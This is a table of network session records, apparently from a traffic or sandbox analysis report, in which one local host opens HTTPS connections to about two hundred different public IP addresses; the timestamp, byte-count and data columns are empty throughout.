                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15242192.168.2.2347556203.241.238.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15243192.168.2.233572492.184.10.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15244192.168.2.235375443.71.248.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15245192.168.2.234804863.96.185.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15246192.168.2.2339608133.203.89.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15247192.168.2.2342320200.193.210.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15248192.168.2.235063648.12.118.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15249192.168.2.2337804207.33.1.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15250192.168.2.2357086132.204.200.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15251192.168.2.2354624156.131.105.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15252192.168.2.2359682190.159.219.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15253192.168.2.233784086.4.195.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15254192.168.2.2348220150.252.49.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15255192.168.2.2360468139.140.134.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15256192.168.2.2334774185.171.155.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15257192.168.2.2346822172.214.111.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15258192.168.2.2340446158.39.28.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15259192.168.2.2340234197.85.56.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15260192.168.2.234322844.146.172.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15261192.168.2.235114485.31.170.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15262192.168.2.234396235.184.244.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15263192.168.2.2350988166.13.122.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15264192.168.2.2336066101.163.5.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15265192.168.2.236053246.144.102.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15266192.168.2.2341356121.211.120.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15267192.168.2.2348808183.109.75.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15268192.168.2.2335952192.123.195.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15269192.168.2.235310241.23.185.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15270192.168.2.2345756130.218.239.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15271192.168.2.2350774185.212.0.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15272192.168.2.235584454.205.141.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15273192.168.2.2347646131.46.117.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15274192.168.2.235324834.88.91.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15275192.168.2.2347252128.45.94.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15276192.168.2.2335858166.224.125.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15277192.168.2.2355616130.8.35.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15278192.168.2.2360774212.255.13.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15279192.168.2.2340644185.56.221.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15280192.168.2.234626889.28.176.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15281192.168.2.2357812142.239.182.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15282192.168.2.2357356166.79.44.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15283192.168.2.234682635.66.42.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15284192.168.2.233840097.51.208.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15285192.168.2.234906023.15.175.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15286192.168.2.2337090184.104.47.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15287192.168.2.2351268182.128.91.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15288192.168.2.2349942186.227.60.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15289192.168.2.2350750213.98.153.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15290192.168.2.234798646.205.14.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15291192.168.2.2335808180.228.222.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15292192.168.2.2359110194.165.113.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15293192.168.2.234857070.5.95.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15294192.168.2.2332850211.217.99.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15295192.168.2.234913412.167.253.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15296192.168.2.2343890144.48.101.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15297192.168.2.2335600114.74.185.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15298192.168.2.2342082221.17.50.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15299192.168.2.2335024123.88.5.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15300192.168.2.233625460.114.216.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15301192.168.2.2347288113.243.251.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15302192.168.2.233664459.136.135.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15303192.168.2.233833070.76.103.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15304192.168.2.2349132173.31.238.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15305192.168.2.2349580208.141.193.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15306192.168.2.234176832.188.188.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15307192.168.2.2352728117.157.213.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15308192.168.2.234970427.224.80.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15309192.168.2.233847877.228.65.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15310192.168.2.233511044.79.101.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15311192.168.2.234853883.140.185.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15312192.168.2.2355170130.193.235.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15313192.168.2.2340566128.17.182.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15314192.168.2.2347536101.10.32.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15315192.168.2.2358284153.4.242.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15316192.168.2.235006846.77.172.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15317192.168.2.2352324168.128.132.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15318192.168.2.2347252137.206.9.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15319192.168.2.2345820172.1.84.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15320192.168.2.235249075.207.169.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15321192.168.2.2340528203.213.203.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15322192.168.2.2352410216.91.61.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15323192.168.2.235919058.8.132.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15324192.168.2.234345440.251.6.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15325192.168.2.2350036139.201.17.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15326192.168.2.2337920156.79.247.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15327192.168.2.2347350111.118.241.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15328192.168.2.235092290.5.112.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15329192.168.2.234080082.49.66.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15330192.168.2.2351836139.108.29.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15331192.168.2.2357716122.135.198.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15332192.168.2.2340680200.159.158.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15333192.168.2.234655867.248.202.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15334192.168.2.2352526207.46.33.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15335192.168.2.2336882154.168.105.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15336192.168.2.2354406205.57.213.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15337192.168.2.2346260140.199.158.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15338192.168.2.235659897.144.127.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15339192.168.2.2336946188.144.10.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15340192.168.2.2335872142.30.51.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15341192.168.2.2359348175.238.121.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15342192.168.2.2343628120.96.179.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15343192.168.2.2333524133.111.3.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15344192.168.2.2341864168.237.249.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15345192.168.2.2341504218.187.16.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15346192.168.2.234468078.136.141.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15347192.168.2.233677659.234.209.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15348192.168.2.2341408164.83.72.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15349192.168.2.2351018170.171.54.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15350192.168.2.2349094154.118.22.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15351192.168.2.2349686221.118.183.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15352192.168.2.235350087.164.142.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15353192.168.2.2345742212.143.137.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15354192.168.2.235892017.218.82.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15355192.168.2.2354152206.251.60.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15356192.168.2.235830443.140.87.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15357192.168.2.235193053.142.221.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15358192.168.2.234640836.61.254.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15359192.168.2.235628035.121.174.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15360192.168.2.235659053.35.199.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15361192.168.2.233856812.44.211.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15362192.168.2.23387361.79.9.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15363192.168.2.233563232.36.71.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15364192.168.2.235816014.182.198.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15365192.168.2.2360446121.135.248.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15366192.168.2.2341938149.124.187.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15367192.168.2.2337086103.4.166.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15368192.168.2.2360514198.16.124.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15369192.168.2.233772246.169.60.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15370192.168.2.233374227.32.199.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15371192.168.2.2333784164.78.55.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15372192.168.2.2358966155.175.89.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15373192.168.2.23454585.197.98.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15374192.168.2.2357766119.208.220.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15375192.168.2.2354092140.79.236.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15376192.168.2.2334446114.235.61.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15377192.168.2.2355218197.36.255.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15378192.168.2.2341756114.4.38.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15379192.168.2.2341768179.86.139.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15380192.168.2.2333548202.220.141.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15381192.168.2.235318048.240.160.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15382192.168.2.235148035.182.252.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15383192.168.2.2348232100.1.24.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15384192.168.2.2345004144.251.242.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15385192.168.2.2359958159.197.99.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15386192.168.2.234659225.26.22.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15387192.168.2.234034063.144.102.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15388192.168.2.2332882191.132.74.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15389192.168.2.233959444.139.49.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15390192.168.2.234418085.240.92.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15391192.168.2.2356346202.25.88.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15392192.168.2.235746442.0.195.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15393192.168.2.235713824.112.221.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15394192.168.2.2351184128.105.142.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15395192.168.2.235176287.42.104.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15396192.168.2.2336682187.184.21.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15397192.168.2.233477018.172.86.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15398192.168.2.2347666131.157.78.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15399192.168.2.2347334133.243.219.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15400192.168.2.235011054.246.98.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15401192.168.2.2334286210.190.242.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15402192.168.2.2356790164.168.233.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15403192.168.2.2342852166.82.205.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15404192.168.2.235457227.53.28.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15405192.168.2.233665646.77.190.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15406192.168.2.2356342109.164.33.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15407192.168.2.2347124198.182.115.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15408192.168.2.235117670.186.179.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15409192.168.2.235574671.130.171.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15410192.168.2.2333272104.113.229.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15411192.168.2.234760039.155.206.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15412192.168.2.2337744183.170.138.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15413192.168.2.2342480159.99.63.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15414192.168.2.2351308198.127.176.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15415192.168.2.2335488184.197.159.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15416192.168.2.2357628193.77.242.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15417192.168.2.233420077.197.22.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15418192.168.2.235215868.156.20.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15419192.168.2.2352368105.249.25.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15420192.168.2.2340110122.251.214.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15421192.168.2.2332806195.26.56.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15422192.168.2.2350326103.82.119.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15423192.168.2.2344998191.94.104.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15424192.168.2.234307469.2.95.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15425192.168.2.2341606179.185.56.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15426192.168.2.2351054170.32.174.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15427192.168.2.2360732184.112.165.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15428192.168.2.2343946181.120.159.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15429192.168.2.235010836.40.15.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15430192.168.2.2353516205.183.35.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15431192.168.2.235639075.29.250.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15432192.168.2.2341640135.150.76.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15433192.168.2.236013093.34.14.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15434192.168.2.2341184123.113.134.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15435192.168.2.2341274181.167.41.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15436192.168.2.2351880104.160.231.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15437192.168.2.2356776209.69.6.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15438192.168.2.235522660.151.159.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15439192.168.2.2344978152.249.78.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15440192.168.2.235324084.56.252.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15441192.168.2.2357300150.5.6.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15442192.168.2.2334022131.237.227.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15443192.168.2.2343412197.208.189.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15444192.168.2.2355340103.239.201.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15445192.168.2.2348332114.128.91.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15446192.168.2.2353692212.107.129.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15447192.168.2.2355062131.235.253.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15448192.168.2.234361860.122.163.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15449192.168.2.2335992116.17.105.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15450192.168.2.2339062173.197.119.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15451192.168.2.233291896.25.143.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15452192.168.2.235869240.238.208.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15453192.168.2.2350220198.61.117.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15454192.168.2.234827081.252.76.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15455192.168.2.2355466167.196.200.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15456192.168.2.236090094.65.154.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15457192.168.2.233388040.236.132.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15458192.168.2.2333228112.19.224.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15459192.168.2.234796691.130.119.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15460192.168.2.2345378152.201.133.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15461192.168.2.23510829.251.66.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15462192.168.2.2351346117.232.146.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15463192.168.2.2354180101.156.124.68443
